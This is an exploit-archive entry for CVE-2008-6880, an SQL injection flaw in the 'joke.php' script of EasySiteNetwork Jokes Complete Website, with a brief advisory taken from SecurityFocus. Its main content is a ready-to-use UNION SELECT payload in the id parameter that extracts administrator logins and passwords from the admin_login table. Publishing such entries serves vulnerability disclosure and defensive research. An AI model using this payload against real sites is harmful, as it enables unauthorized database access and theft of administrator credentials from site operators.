Easysitenetwork Jokes Complete Website - 'joke.php' SQL Injection



EKU-ID: 37573 CVE: CVE-2008-6880;OSVDB-52032 OSVDB-ID:
Author: Ehsan_Hp200 Published: 2008-12-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/32908/info

EasySiteNetwork Jokes Complete Website is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login--